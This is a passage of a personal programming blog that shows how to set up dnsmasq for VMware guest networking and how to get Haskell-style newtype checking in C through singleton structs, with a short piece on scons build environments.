In addition, scons has the concept of “build environments”, which are objects that include build rules, variables, and so on. By reifying what make just represents as the global environment into objects, it makes it much easier to scope and program things. For example, if you have a set of targets that should be built using the global default rules, except with debugging enabled, you can do:

myenv = env.Clone()
myenv.Append(CFLAGS = ['-g'])
myenv.Program(...)

By making it (optionally) explicit which sets of rules and variables are being used in each place, it becomes much easier to share multiple kinds of targets and rule sets in a single file, without necessitating lots of sub-files just for scoping, like make tends to lead to.

scons is cool for a bunch of reasons. It eliminates most of the stupid little annoyances you’ve probably had with make. But, in my mind, this is the thing that makes it cool. They’ve added sane scoping to the build tool, so that you can construct non-recursive build systems without going insane.

I’ll definitely be considering scons for any new projects I write going forward. I hate make, and this definitely feels like a path forward.

Nov 7th, 2010

Configuring dnsmasq with VMware Workstation

I love VMware Workstation. I keep VMs around for basically every version of every major Linux distribution, and use them heavily for all kinds of kernel testing and development.

This post is a quick writeup of my networking setup with VMware Workstation, using dnsmasq to assign my VMs addresses and provide a DNS server to resolve VM addresses.

The objective

I want to be able to resolve my VMs’ hostnames so that I can ssh to them, or run other network services and access them from the host. I could just assign static addresses and put them in /etc/hosts, but that’s totally lame, and liable to be a source of error and frustration, because I have dozens of VMs, and add and remove them frequently.

We’re going to set things up so that when VMs get addresses from DHCP, their hostnames automatically become resolvable, using the .vmware domain. To do this, we’re going to set up a piece of software called dnsmasq, which is a flexible DNS and DHCP server, designed for basically exactly this purpose.

The setup

Because I use my VMs for local testing, I just keep most of them on a local NAT on my machine. I configure that virtual network inside VMware as follows (run vmware-netconfig, or follow the appropriate menus):

Note how I disable “Use local DHCP service to distribute IP addresses to VMs”: we’re going to set up dnsmasq to provide DHCP, so we don’t want it fighting with VMware’s.

Notice that the subnet I’m using here is 172.16.37.* — if you choose a different one, you’ll need to adjust accordingly later.

Configuring dnsmasq

Then, I install dnsmasq, and configure /etc/dnsmasq.conf as follows:

listen-address=172.16.37.1
listen-address=127.0.0.1
no-dhcp-interface=lo

server=192.168.1.1
local=/vmware/

no-hosts
no-resolv

domain=vmware
dhcp-fqdn

dhcp-range=172.16.37.3,172.16.37.200,12h
dhcp-authoritative
dhcp-option=option:router,172.16.37.2

Here’s what each of those lines means, in order:

listen-address=172.16.37.1
listen-address=127.0.0.1
no-dhcp-interface=lo

We don’t want dnsmasq serving DHCP or DNS to the outside world or other virtual networks, so we tell it to listen only on the loopback interface (so that we can talk to it from the host) and on the virtual network we set up in the previous step. We don’t want it serving DHCP to localhost, though, so we tell it not to.

server=192.168.1.1
local=/vmware/

Here we tell dnsmasq how to forward DNS requests to the outside world. We’re going to be using dnsmasq as our primary nameserver, and having it forward requests for things it doesn’t understand to a real DNS server. In my case, that’s my LAN’s router, at 192.168.1.1. The local line tells dnsmasq that the .vmware domain is local, and it should never forward requests to resolve things in that domain.

If I needed something more complicated, it might be possible to use the resolv-file option or similar, but I don’t, personally.

no-hosts
no-resolv

These options tell dnsmasq not to look at resolv.conf or /etc/hosts when resolving names — we want it only to resolve VMs itself, and to forward everything else.

domain=vmware
dhcp-fqdn

This tells dnsmasq to assign the .vmware domain to hosts it hands out DHCP to, so that we can resolve VMs in the .vmware domain.

dhcp-range=172.16.37.3,172.16.37.200,12h
dhcp-authoritative

And finally, we configure the DHCP server. We give it a range of addresses to assign on the subnet we created earlier. We start at .3, because .1 is the host and .2 is the address of VMware’s router, and I stop at .200 so that I can leave the last few addresses open for static IPs if I need them for some reason. dhcp-authoritative enables some optimizations when dnsmasq knows it is the only DHCP server around.

dhcp-option=option:router,172.16.37.2

Finally, we need dhcp-option to tell DHCP clients to use the VMware-provided router at .2 as their gateway, instead of using the host, at .1. We could configure the host to be a NAT server using Linux’s NAT, but that’s outside the scope of this document.

Configuring the host

Now, we need to configure the host to use dnsmasq as our DNS server. This is a simple matter of telling the host to use 127.0.0.1 as our DNS server, and to add .vmware to our search path. If we’re editing resolv.conf directly, it would look like:

search vmware
nameserver 127.0.0.1

Configuring guests

We need to configure our guests to send a hostname along with their DHCP requests, so that dnsmasq can add them to its address table. How to do this varies by OS, but most modern OSes do it automatically. If they don’t, here are a few hints:

For RHEL-based distros, edit /etc/sysconfig/network-scripts/ifcfg-INTERFACE, and add a line like

 DHCP_HOSTNAME=centos-5-amd64

For most other Linux distributions, you can often edit dhclient.conf (usually in /etc/ or /etc/dhclient/) to include:

 send host-name "centos-5-amd64";

Or, with a recent dhclient,

 send host-name "<hostname>";

will make it look up the machine’s actual hostname.

Conclusions

That’s all there is to it. This is a pretty simple setup, but hopefully someone else will find this useful. If you need dnsmasq to do something more subtle, the documentation is mostly quite good.

Oct 24th, 2010

Using Haskell’s ‘newtype’ in C

A common problem in software engineering is avoiding confusion and errors when dealing with multiple types of data that share the same representation. Classic examples include differentiating between measurements stored in different units, distinguishing between a string of HTML and a string of plain text (one of these needs to be encoded before it can safely be included in a web page!), or keeping track of pointers to physical memory or virtual memory when writing the lower layers of an operating system’s memory management.

Unless we’re using a richly-typed language like Haskell, where we can use newtype, the best solutions tend to just rely on convention. The much-maligned Hungarian Notation evolved in part to try to combat this sort of problem: if you decide on a convention that variables representing physical addresses start with pa and virtual addresses start with va, then anyone who encounters a uintptr_t pa_bootstack; can immediately decode the intent.

It turns out, though, that we can get something very much like newtype in familiar old C. Suppose we’re writing some of the paging code for a toy x86 architecture. We’re going to be passing around a lot of physical and virtual addresses, as well as indexes of pages in RAM, and it’s going to be easy to confuse them all. The traditional solution is to use some typedefs, and then promise to be very careful not to mix them up:

typedef uint32_t physaddr_t;
typedef uint32_t virtaddr_t;
typedef uint32_t ppn_t;

We have to promise not to mess up, though — the compiler isn’t going to notice if I pass a ppn_t to a function that wanted a physaddr_t.
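
To make the problem concrete, here is a minimal sketch of such a mix-up. The page_number helper and the 4096-byte page size are assumptions made for illustration; they are not taken from JOS.

```c
#include <assert.h>
#include <stdint.h>

typedef uint32_t physaddr_t;
typedef uint32_t ppn_t;

/* Hypothetical helper: physical address -> physical page number,
 * assuming 4096-byte pages (a 12-bit shift). */
static inline ppn_t page_number(physaddr_t pa) {
    return pa >> 12;
}

void typedef_demo(void) {
    physaddr_t pa = 0x5000;
    ppn_t ppn = page_number(pa);

    /* Intended use: address 0x5000 lives in page 5. */
    assert(ppn == 5);

    /* Bug: a page number is passed where an address is expected.
     * Both typedefs name the same type, so this compiles without any
     * diagnostic and quietly produces page 0. */
    assert(page_number(ppn) == 0);
}
```

Nothing in the second call looks wrong to the compiler, which is exactly the failure mode the typedefs were supposed to guard against.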

This example was inspired by JOS, a toy operating system used by MIT’s Operating Systems Engineering class. JOS remaps all of physical memory starting at a specific virtual memory address (KERNBASE), and so provides the following macros:

/* This macro takes a kernel virtual address -- an address that points above
 * KERNBASE, where the machine's maximum 256MB of physical memory is mapped --
 * and returns the corresponding physical address.  It panics if you pass it a
 * non-kernel virtual address.
 */
#define PADDR(kva)                                          \
({                                                          \
        physaddr_t __m_kva = (physaddr_t) (kva);            \
        if (__m_kva < KERNBASE)                                     \
                panic("PADDR called with invalid kva %08lx", __m_kva);\
        __m_kva - KERNBASE;                                 \
})

/* This macro takes a physical address and returns the corresponding kernel
 * virtual address.  It panics if you pass an invalid physical address. */
#define KADDR(pa)                                           \
({                                                          \
        physaddr_t __m_pa = (pa);                           \
        uint32_t __m_ppn = PPN(__m_pa);                             \
        if (__m_ppn >= npage)                                       \
                panic("KADDR called with invalid pa %08lx", __m_pa);\
        (void*) (__m_pa + KERNBASE);                                \
})

Because the typedefs are unchecked by the compiler, though, it is a common mistake to use a physical address where a virtual address is meant, and nothing will catch it until your kernel triple-faults, and a long, painful debugging session ensues.

Inspired by Haskell’s newtype, though, it turns out we can get the compiler to check it for us, with a little more work, by using a singleton struct instead of a typedef:

typedef struct { uint32_t val; } physaddr_t;
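
As a rough sketch of what this buys us, the following shows two singleton structs that the compiler keeps apart. The page_offset helper and the 4096-byte page size are hypothetical, chosen only for the example.

```c
#include <assert.h>
#include <stdint.h>

typedef struct { uint32_t val; } physaddr_t;
typedef struct { uint32_t val; } virtaddr_t;

/* Hypothetical helper: byte offset within a page, assuming 4096-byte pages. */
static inline uint32_t page_offset(virtaddr_t va) {
    return va.val & 0xfffu;
}

void singleton_demo(void) {
    virtaddr_t va = { .val = 0xf0001234u };
    physaddr_t pa = { .val = 0x00001234u };

    assert(page_offset(va) == 0x234u);

    /* Both of these are compile errors (left commented out so the file
     * still builds):
     *   page_offset(pa);           physaddr_t is not virtaddr_t
     *   page_offset(0xf0001234u);  a bare integer is not virtaddr_t
     */
    (void)pa;
}
```

The two structs have identical members, but C treats them as distinct, incompatible types, so the mix-up is rejected at compile time instead of at runtime.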

If we wanted to be overly cute, we could even use a macro to mimic Haskell’s newtype:

#define NEWTYPE(tag, repr)                  \
    typedef struct { repr val; } tag;       \
    static inline tag make_##tag(repr v) {  \
            return (tag){.val = v};         \
    }                                       \
    static inline repr tag##_val(tag v) {   \
            return v.val;                   \
    }

NEWTYPE(physaddr, uint32_t);
NEWTYPE(virtaddr, uint32_t);
NEWTYPE(ppn,  uint32_t);

Given those definitions, PADDR and KADDR become:

#define PADDR(kva)                                          \
({                                                          \
    if (virtaddr_val(kva) < KERNBASE)                       \
            panic("PADDR called with invalid kva %08lx", virtaddr_val(kva)); \
    make_physaddr(virtaddr_val(kva) - KERNBASE);            \
})

#define KADDR(pa)                                           \
({                                                          \
    uint32_t __m_ppn = physaddr_val(pa) >> PTXSHIFT;        \
    if (__m_ppn >= npage)                                   \
            panic("KADDR called with invalid pa %08lx", physaddr_val(pa)); \
    make_virtaddr(physaddr_val(pa) + KERNBASE);             \
})

We have to use some accessor and constructor functions, but in exchange, we get strong type-checking: If you pass PADDR a physical address (or anything other than a virtual address), the compiler will catch it.
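
The macros above rely on GNU statement expressions and evaluate their argument more than once. If that is a concern, the same checks can be sketched as inline functions. This is only an illustration: the names paddr and kaddr, the values of KERNBASE, PTXSHIFT and npage, and the use of assert in place of JOS's panic are all assumptions.

```c
#include <assert.h>
#include <stdint.h>

/* Same macro as in the text, invoked without a trailing semicolon. */
#define NEWTYPE(tag, repr)                  \
    typedef struct { repr val; } tag;       \
    static inline tag make_##tag(repr v) {  \
            return (tag){.val = v};         \
    }                                       \
    static inline repr tag##_val(tag v) {   \
            return v.val;                   \
    }

NEWTYPE(physaddr, uint32_t)
NEWTYPE(virtaddr, uint32_t)

/* Assumed values for illustration only. */
#define KERNBASE 0xF0000000u
#define PTXSHIFT 12
static const uint32_t npage = 0x10000; /* 256MB of 4096-byte pages */

/* Kernel virtual address -> physical address. */
static inline physaddr paddr(virtaddr kva) {
    uint32_t v = virtaddr_val(kva);
    assert(v >= KERNBASE);              /* stands in for panic() */
    return make_physaddr(v - KERNBASE);
}

/* Physical address -> kernel virtual address. */
static inline virtaddr kaddr(physaddr pa) {
    uint32_t p = physaddr_val(pa);
    assert((p >> PTXSHIFT) < npage);    /* stands in for panic() */
    return make_virtaddr(p + KERNBASE);
}
```

Because the parameter types are spelled out in the signatures, calling paddr with a physaddr fails to compile in the same way the macro version does.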

The wrapping and unwrapping is slightly annoying, but we can for the most part avoid having to do it everywhere, by pushing the wrapping and unwrapping down into some utility functions. For instance, a relatively common operation at this point in JOS is creating a page-table entry, given a physical address. If you want to construct the PTE by hand, you need to use physaddr_val every time. But a better plan is a simple utility function:

 static inline pte_t make_pte(physaddr addr, int perms) {
     return physaddr_val(addr) | perms;
 }

In addition to losing the need to unwrap the physaddr everywhere, we gain a measure of clarity and typechecking — if you remember to use make_pte, you’ll never accidentally try to insert a virtual address into a page table.

We can add similar functions for converting between types, as well as a struct Page, used to track metadata for a physical page. As an experiment, I went and reimplemented JOS’s memory management primitives using these definitions, and only needed to use FOO_val or make_FOO a very few times outside of the header files that defined KADDR and friends.
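
A conversion helper of this kind might look like the sketch below. The function names and the 12-bit PTXSHIFT value are assumptions for the example, not the definitions I actually used in JOS.

```c
#include <assert.h>
#include <stdint.h>

/* Same macro as in the text, invoked without a trailing semicolon. */
#define NEWTYPE(tag, repr)                  \
    typedef struct { repr val; } tag;       \
    static inline tag make_##tag(repr v) {  \
            return (tag){.val = v};         \
    }                                       \
    static inline repr tag##_val(tag v) {   \
            return v.val;                   \
    }

NEWTYPE(physaddr, uint32_t)
NEWTYPE(ppn, uint32_t)

#define PTXSHIFT 12 /* assumption: 4096-byte pages */

/* Hypothetical conversions: all wrapping and unwrapping happens here,
 * so callers never touch the raw integers. */
static inline ppn physaddr_to_ppn(physaddr pa) {
    return make_ppn(physaddr_val(pa) >> PTXSHIFT);
}

static inline physaddr ppn_to_physaddr(ppn n) {
    return make_physaddr(ppn_val(n) << PTXSHIFT);
}

void convert_demo(void) {
    physaddr pa = make_physaddr(0x5abcu);
    ppn n = physaddr_to_ppn(pa);

    assert(ppn_val(n) == 5);
    /* Converting back yields the base address of the page. */
    assert(physaddr_val(ppn_to_physaddr(n)) == 0x5000u);
}
```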

Performance

While the typechecking is nice, any C programmer implementing a memory-management system is probably going to want to know: How much does it cost me? You’re creating and unpacking these singleton structs everywhere – does that have a cost?

The answer, in almost all cases, is “no”: a half-decent compiler will optimize the resulting code to be completely identical to the code without the structs.

Also, the in-memory representation of the struct is going to be exactly the same as the bare value — it’s even guaranteed to have the same alignment and padding constraints, so if you need to embed a physaddr inside another struct, or into an array, the representation is identical to the physaddr_t typedef.
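
If you would rather have the compiler confirm the layout claim than take it on faith, C11 static assertions can check it on whatever platform you build for. This is a sketch: the region structs are hypothetical, and the checks are expected to pass on the usual i386 and amd64 ABIs rather than being guaranteed by the C standard.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct { uint32_t val; } physaddr;

/* The wrapper should be indistinguishable from the bare integer. */
static_assert(sizeof(physaddr) == sizeof(uint32_t),
              "wrapper adds no padding");
static_assert(_Alignof(physaddr) == _Alignof(uint32_t),
              "wrapper has the same alignment");
static_assert(offsetof(physaddr, val) == 0,
              "value sits at the start of the wrapper");

/* Hypothetical structs: embedding the wrapper should not change layout. */
struct region     { physaddr base; uint32_t len; };
struct region_raw { uint32_t base; uint32_t len; };

static_assert(sizeof(struct region) == sizeof(struct region_raw),
              "embedding the wrapper keeps the size");
static_assert(offsetof(struct region, len) == offsetof(struct region_raw, len),
              "embedding the wrapper keeps member offsets");
```

If any of these fails, the build stops with the message attached to the failing check, which is a cheap way to find out that a given ABI behaves differently.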

On i386, parameters are passed on the stack, so that means that passing the struct is identical to passing the uint32_t. On amd64, as described last week, small structures are passed in registers, and so, again, the calling convention is identical.

Unfortunately, the i386 ABI specifies that returned structs always go through memory on the stack (while integers go in %eax), so you do pay slightly if you want to return one of these wrapped values. amd64 returns a struct this small in a register, though, so on a 64-bit machine it’s again identical.

If you’re worried, though, you can always use the preprocessor to make the checks vanish for a production build:

#ifdef NDEBUG
#define NEWTYPE(tag, repr)                  \
    typedef repr tag;                       \
    static inline tag make_##tag(repr v) {  \
            return v;                       \
    }                                       \
    static inline repr tag##_val(tag v) {   \
            return v;                       \
    }
#else
/* Same definition as above */
#endif

Because the types have identical representations, you can safely serialize your structs and exchange them between code compiled with either version. On amd64, you can probably even call between compilation units defined either way.
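
As a small illustration of the serialization claim, the sketch below copies a wrapped value into a byte buffer and reads it back as a bare uint32_t. The helper names are made up for the example, and the static assertion records the assumption that the wrapper has no padding.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

typedef struct { uint32_t val; } physaddr;

/* Assumption the round trip depends on: no padding in the wrapper. */
static_assert(sizeof(physaddr) == sizeof(uint32_t),
              "wrapper and bare value must have the same size");

/* Hypothetical helper: write the wrapped value's bytes into a buffer. */
static inline void store_physaddr(unsigned char *buf, physaddr pa) {
    memcpy(buf, &pa, sizeof pa);
}

/* Hypothetical helper: read the same bytes back as a bare integer,
 * as code built with the plain typedef would. */
static inline uint32_t load_raw(const unsigned char *buf) {
    uint32_t raw;
    memcpy(&raw, buf, sizeof raw);
    return raw;
}

uint32_t roundtrip_demo(uint32_t v) {
    unsigned char buf[sizeof(uint32_t)];
    physaddr pa = { .val = v };

    store_physaddr(buf, pa);
    return load_raw(buf);
}
```

The value comes back unchanged, which is what lets a debug build (with structs) and a production build (with bare typedefs) read each other's data.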

The next time you’re writing some subtle C code that has to deal with multiple types with the same representation, I encourage you to consider using this trick.

Addendum

I didn’t invent this trick, although as far as I know the NEWTYPE macro is my own invention. (Edited to add: A commenter points out that I’m not the first to use the newtype name in C, although I think I prefer my implementation.)

I learned this trick from the Linux kernel, which uses it for a very similar application: distinguishing entries in different levels of the x86 page tables. page.h on amd64 includes the following definitions (taken from an old version, but the current version has equivalent ones):

/*
 * These are used to make use of C type-checking..
 */
typedef struct { unsigned long pte; } pte_t;
typedef struct { unsigned long pmd; } pmd_t;
typedef struct { unsigned long pud; } pud_t;
typedef struct { unsigned long pgd; } pgd_t;

I claimed above that the struct and the bare type will have the same alignment and padding. I don’t believe this is guaranteed by C99, but the SysV amd64 and i386 ABI specifications both require:

Structures and unions assume the alignment of their most strictly aligned component. Each member is assigned to the lowest available offset with the appropriate alignment. The size of any object is always a multiple of the object’s alignment.

(text quoted from the amd64 document, but the i386 one is almost identical).

And C99 requires (§6.7.2.1 para 13):

… A pointer to a structure object, suitably converted, points to its initial member (or if that member is a bit-field, then to the unit in which it resides), and vice versa. There may be unnamed padding within a structure object, but not at its beginning.

I believe these requirements, taken together, should be enough to ensure that the struct and the bare type will have the same representation.